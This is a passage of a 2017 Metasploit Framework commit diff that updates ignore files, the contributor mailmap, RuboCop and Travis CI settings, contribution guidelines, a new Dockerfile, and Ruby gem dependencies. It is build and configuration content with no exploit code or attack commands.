Land #8901 , update nessus v2 import for consistent proto case

update nessus v2 import for consistent proto case
Land #8898 , move Dockerfile for publishing
2017-08-28 15:54:47 -05:00 · 2017-08-28 12:32:04 -05:00 · 2017-08-28 10:51:52 -05:00 · 2017-08-28 17:14:46 +02:00 · 2017-08-28 16:57:28 +02:00 · 2017-08-28 09:10:09 -05:00
5088 changed files with 126481 additions and 98647 deletions
@@ -0,0 +1,102 @@
+.dockerignore
+.gitignore
+.env*
+docker-compose*.yml
+docker/
+!docker/msfconsole.rc
+README.md
+.git/
+.github/
+.ruby-version
+.ruby-gemset
+
+.bundle
+Gemfile.local
+Gemfile.local.lock
+# Rubymine project directory
+.idea
+# Sublime Text project directory (not created by ST by default)
+.sublime-project
+# RVM control file, keep this to avoid backdooring Metasploit
+.rvmrc
+# Allow for a local choice of (unsupported / semi-supported) ruby versions
+# See PR #4136 for usage, but example usage for rvm:
+#   rvm --create --versions-conf use 2.1.4@metasploit-framework
+# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
+#   rbenv shell 2.1.4
+.versions.conf
+# YARD cache directory
+.yardoc
+# Mac OS X files
+.DS_Store
+# database config for testing
+config/database.yml
+# target config file for testing
+features/support/targets.yml
+# simplecov coverage data
+coverage
+doc/
+external/source/meterpreter/java/bin
+external/source/meterpreter/java/build
+external/source/meterpreter/java/extensions
+external/source/javapayload/bin
+external/source/javapayload/build
+# Java binary ignores. Replace the 5 above with this once we're merged.
+external/source/javapayload/*/.classpath
+external/source/javapayload/*/.project
+external/source/javapayload/*/.settings
+external/source/javapayload/*/bin
+external/source/javapayload/*/target
+external/source/javapayload/*/*/.classpath
+external/source/javapayload/*/*/.project
+external/source/javapayload/*/*/.settings
+external/source/javapayload/*/*/bin
+external/source/javapayload/*/*/target
+# Packaging directory
+pkg
+tags
+*.swp
+*.orig
+*.rej
+*~
+# Ignore backups of retabbed files
+*.notab
+
+# ignore Visual Studio external source garbage
+*.suo
+*.sdf
+*.opensdf
+*.user
+
+# Rails log directory
+/log
+# Rails tmp directory
+/tmp
+
+# ignore release/debug folders for exploits
+external/source/exploits/**/Debug
+external/source/exploits/**/Release
+
+# Avoid checking in Meterpreter binaries. These are supplied upstream by
+# the metasploit-payloads gem.
+data/meterpreter/*.dll
+data/meterpreter/*.php
+data/meterpreter/*.py
+data/meterpreter/*.bin
+data/meterpreter/*.jar
+data/meterpreter/*.lso
+data/android
+data/java
+
+# Avoid checking in Meterpreter libs that are built from
+# private source. If you're interested in this functionality,
+# check out Metasploit Pro: https://metasploit.com/download
+data/meterpreter/ext_server_pivot.*.dll
+
+# Avoid checking in metakitty, the source for
+# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
+/metakitty
+.vagrant
+
+# no need for rspecs
+spec/
@@ -11,4 +11,5 @@ List the steps needed to make sure this thing works
 - [ ] ...
 - [ ] **Verify** the thing does what it should
 - [ ] **Verify** the thing does not do what it should not
+- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

@@ -78,9 +78,17 @@ data/java

 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll

 # Avoid checking in metakitty, the source for
 # https://rapid7.github.io/metasploit-framework. It's an orphan branch.
 /metakitty
+.vagrant
+
+# local docker compose overrides
+docker-compose.local*
+
+# Ignore python bytecode
+*.pyc
+rspec.failures
@@ -1,45 +1,56 @@
-acammack-r7 <acammack-r7@github>     Adam Cammack <Adam_Cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
+bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bcook-r7 <bcook-r7@github>           Brent Cook <bcook@rapid7.com>
-bturner-r7 <bturner-r7@github>       Brandon Turner <brandon_turner@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     Chris Doughty <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     Deral Heiland <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     David Maloney <DMaloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     David Maloney <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     dmaloney-r7 <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         Erran Carey <e@ipwnstuff.com>
-farias-r7 <farias-r7@github>         Fernando Arias <fernando_arias@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>     Greg Mikeska <greg_mikeska@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>     Gregory Mikeska <greg_mikeska@rapid7.com>
-jhart-r7 <jhart-r7@github>           Jon Hart <jon_hart@rapid7.com>
-jlee-r7 <jlee-r7@github>             <egypt@metasploit.com> # aka egypt
-jlee-r7 <jlee-r7@github>             <james_lee@rapid7.com>
-kgray-r7 <kgray-r7@github>           Kyle Gray <kyle_gray@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     darkbushido <lance.sanchez@gmail.com>
-lsato-r7 <lsato-r7@github>           Louis Sato <lsato@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     Samuel Huckins <samuel_huckins@rapid7.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <todb@metasploit.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <todb@packetfu.com>
+bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
+bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
+bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
+egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
+egypt <egypt@github>                 <james_lee@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
+jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
+jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>       <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
+kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
+khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
+lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
+pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
+tatanus <tatanus@github>             <adam_compton@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>             <todb@metasploit.com>
+todb-r7 <todb-r7@github>             <todb@packetfu.com>
 wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               William Vu <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               William Vu <wvu@metasploit.com>
-wvu-r7 <wvu-r7@github>               William Vu <wvu@nmt.edu>
-wvu-r7 <wvu-r7@github>               wvu-r7 <William_Vu@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           William Webb <William_Webb@rapid7.com>
+wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
+wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
+wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -53,15 +64,14 @@ bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
 bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
-brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
+brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
+bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
-Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
-Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
+Chao-mu <Chao-Mu@github>               <chao.mu@minorcrash.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 claudijd <claudijd@github>             Jonathan Claudius <claudijd@yahoo.com>
@@ -72,22 +82,24 @@ crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
+espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
+farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
+FireFart <FireFart@github>             <firefart@gmail.com>
 FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
-FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
+gmikeska-r7 <gmikeska-r7@github>       <greg_mikeska@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <=>
+gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <YOUR_USERNAME_FOR_EMAIL>
 g0tmi1k <g0tmi1k@github>               <g0tmi1k@users.noreply.github.com>
 g0tmi1k <g0tmi1k@github>               <have.you.g0tmi1k@gmail.com>
+h00die <h00die@github>                 <h00die@users.noreply.github.com>
+h00die <h00die@github>                 <mike@shorebreaksecurity.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
+hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
-jabra <jabra@github>                   Josh Abraham <jabra@spl0it.org>
-jabra <jabra@github>                   Joshua Abraham <jabra@spl0it.org>
+jabra <jabra@github>                   <jabra@spl0it.org>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -95,9 +107,9 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
+joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
-joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           jvennix-r7 <Joe_Vennix@rapid7.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan.vazquez@metasploit.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
@@ -126,15 +138,20 @@ r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rep <mschloesser-r7@github>            Mark Schloesser <mark_schloesser@rapid7.com>
 rep <mschloesser-r7@github>            mschloesser-r7 <mark_schloesser@rapid7.com>
+RageLtMan <sempervictus@github>        <rageltman [at] sempervictus>
+RageLtMan <sempervictus@github>        <rageltman@sempervictus.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
+rwhitcroft <rwhitcroft@github>         <rwhitcroft.github@gmail.com>
+rwhitcroft <rwhitcroft@github>         <rwhitcroft@gmail.com>
+rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
-stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
+stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
@@ -144,17 +161,18 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-void-in <void-in@github>               root <void-in@users.noreply.github.com>
-void-in <void-in@github>               void-in <root@localhost.localdomain>
-void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
+void-in <void-in@github>               void-in <root@localhost.localdomain>
+void-in <void-in@github>               <void-in@users.noreply.github.com>
+void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

-
 # Aliases for utility author names. Since they're fake, typos abound

-Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
+Metasploit Bot <metasploit@rapid7.com>    Metasploit <metasploit@rapid7.com>
+Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -8,18 +8,57 @@

 # inherit_from: .rubocop_todo.yml

+AllCops:
+  TargetRubyVersion: 2.2
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
  Exclude:
    - 'modules/**/*'

+Metrics/AbcSize:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/CyclomaticComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/PerceivedComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Style/FrozenStringLiteralComment:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
+Style/RedundantReturn:
+  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
+  Enabled: false
+
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
  Exclude:
    - 'modules/**/*'

+Layout/IndentHeredoc:
+  Enabled: false
+  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+
+Style/GuardClause:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/NegatedIf:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/ConditionalAssignment:
+  Enabled: false
+  Description: 'This is confusing for folks coming from other languages'
+
 Style/Encoding:
  Enabled: true
  Description: 'We prefer binary to UTF-8.'
@@ -53,7 +92,7 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Style/SpaceInsideBrackets:
+Layout/SpaceInsideBrackets:
  Enabled: false
  Description: 'Until module template are final, most modules will fail this.'

@@ -1 +1 @@
-2.3.1
+2.4.1
@@ -1,24 +1,29 @@
+dist: trusty
 sudo: false
 group: stable
 bundler_args: --without coverage development pcap
 cache: bundler
 addons:
-  postgresql: '9.3'
+  postgresql: '9.6'
  apt:
    packages:
      - libpcap-dev
      - graphviz
 language: ruby
 rvm:
-  - '2.3.1'
+  - '2.2'
+  - '2.3.4'
+  - '2.4.1'

 env:
-  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
-  - RAKE_TASKS=spec SPEC_OPTS="--tag content"
-  - RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'

 matrix:
  fast_finish: true
+  include:
+  - rvm: ruby-head
+    env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
 before_install:
  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
  - rake --version
@@ -26,14 +31,18 @@ before_install:
  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
+  # Update the bundler
+  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
  - bundle exec rake --version
  - bundle exec rake db:create
  - bundle exec rake db:migrate
-script:
  # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
+  - git diff --exit-code db/schema.rb
+script:
+  - echo "${CMD}"
+  - bash -c "${CMD}"

 notifications:
  irc: "irc.freenode.org#msfnotify"
@@ -46,3 +55,6 @@ branches:
  except:
    - gh-pages
    - metakitty
+
+services:
+  - docker
@@ -45,6 +45,8 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
+* **Do** [reference associated issues] in your pull request description
+* **Do** write [release notes] once a pull request is landed
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

@@ -56,6 +58,10 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
 * **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
+* **Do** include instructions on how to setup the vulnerable environment or software
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
+
+

 #### Scripts

@@ -102,6 +108,8 @@ already way ahead of the curve, so keep it up!
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
+[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
+[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
 [PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
 [PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
@@ -111,4 +119,4 @@ already way ahead of the curve, so keep it up!
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2016, Rapid7, Inc.
+Copyright (C) 2006-2017, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -0,0 +1,58 @@
+FROM ruby:2.4.1-alpine
+MAINTAINER Rapid7
+
+ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
+ENV APP_HOME /usr/src/metasploit-framework/
+ENV MSF_USER msf
+ENV NMAP_PRIVILEGED=""
+WORKDIR $APP_HOME
+
+COPY Gemfile* m* Rakefile $APP_HOME
+COPY lib $APP_HOME/lib
+
+RUN apk update && \
+    apk add \
+      sqlite-libs \
+      nmap \
+      nmap-scripts \
+      nmap-nselibs \
+      postgresql-libs \
+      ncurses \
+      libcap \
+    && apk add --virtual .ruby-builddeps \
+      autoconf \
+      bison \
+      build-base \
+      ruby-dev \
+      openssl-dev \
+      readline-dev \
+      sqlite-dev \
+      postgresql-dev \
+      libpcap-dev \
+      libxml2-dev \
+      libxslt-dev \
+      yaml-dev \
+      zlib-dev \
+      ncurses-dev \
+      git \
+    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
+    && gem update --system \
+    && gem install bundler \
+    && bundle install --system $BUNDLER_ARGS \
+    && apk del .ruby-builddeps \
+    && rm -rf /var/cache/apk/*
+
+# fix for robots gem not readable (known bug)
+# https://github.com/rapid7/metasploit-framework/issues/6068
+RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
+
+RUN adduser -g msfconsole -D $MSF_USER
+
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap
+
+USER $MSF_USER
+
+ADD ./ $APP_HOME
+
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
@@ -6,8 +6,6 @@ gemspec name: 'metasploit-framework'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
  gem 'simplecov'
 end

@@ -19,8 +17,10 @@ group :development do
  # for development and testing purposes
  gem 'pry'
  # module documentation
-  gem 'octokit', '~> 4.0'
-  # rails-upgrade staging gems
+  gem 'octokit'
+  # Metasploit::Aggregator external session proxy
+  # Disabled for now for crypttlv updates
+  # gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -33,14 +33,10 @@ group :development, :test do
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
+  gem 'rspec-rerun'
 end

 group :test do
-  # cucumber extension for testing command line applications, like msfconsole
-  gem 'aruba'
-  # cucumber + automatic database cleaning with database_cleaner
-  gem 'cucumber-rails', :require => false
-  gem 'shoulda-matchers'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -27,8 +27,6 @@ end

 # Create a custom group
 group :local do
-  # Use pry-debugger to step through code during development
-  gem 'pry-debugger', '~> 0.2'
  # Add the lab gem so that the 'lab' plugin will work again
  gem 'lab', '~> 0.2.7'
 end
@@ -1,11 +1,15 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.12.3)
+    metasploit-framework (4.16.3)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
+      backports
      bcrypt
+      bcrypt_pbkdf
+      bit-struct
+      dnsruby
      filesize
      jsobfu
      json
@@ -13,136 +17,142 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.1.11)
+      metasploit-payloads (= 1.3.1)
      metasploit_data_models
+      metasploit_payloads-mettle (= 0.2.2)
      msgpack
+      nessus_rest
+      net-ssh
      network_interface
+      nexpose
      nokogiri
      octokit
      openssl-ccm
+      openvas-omp
      packetfu
      patch_finder
      pcaprub
-      pg
+      pdf-reader
+      pg (= 0.20.0)
      railties
-      rb-readline-r7
+      rb-readline
+      rbnacl (< 5.0.0)
+      rbnacl-libsodium
      recog
      redcarpet
+      rex-arch
+      rex-bin_tools
+      rex-core
+      rex-encoder
+      rex-exploitation
+      rex-java
+      rex-mime
+      rex-nop
+      rex-ole
+      rex-powershell (< 0.1.73)
+      rex-random_identifier
+      rex-registry
+      rex-rop_builder
+      rex-socket
+      rex-sslscan
+      rex-struct2
+      rex-text
+      rex-zip
      robots
+      ruby_smb
+      rubyntlm
      rubyzip
      sqlite3
+      sshkey
      tzinfo
      tzinfo-data
+      windows_error
+      xdr
+      xmlrpc

 GEM
  remote: https://rubygems.org/
  specs:
-    actionpack (4.2.6)
-      actionview (= 4.2.6)
-      activesupport (= 4.2.6)
+    Ascii85 (1.0.2)
+    actionpack (4.2.9)
+      actionview (= 4.2.9)
+      activesupport (= 4.2.9)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.6)
-      activesupport (= 4.2.6)
+    actionview (4.2.9)
+      activesupport (= 4.2.9)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
-      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    activemodel (4.2.6)
-      activesupport (= 4.2.6)
+      rails-html-sanitizer (~> 1.0, >= 1.0.3)
+    activemodel (4.2.9)
+      activesupport (= 4.2.9)
      builder (~> 3.1)
-    activerecord (4.2.6)
-      activemodel (= 4.2.6)
-      activesupport (= 4.2.6)
+    activerecord (4.2.9)
+      activemodel (= 4.2.9)
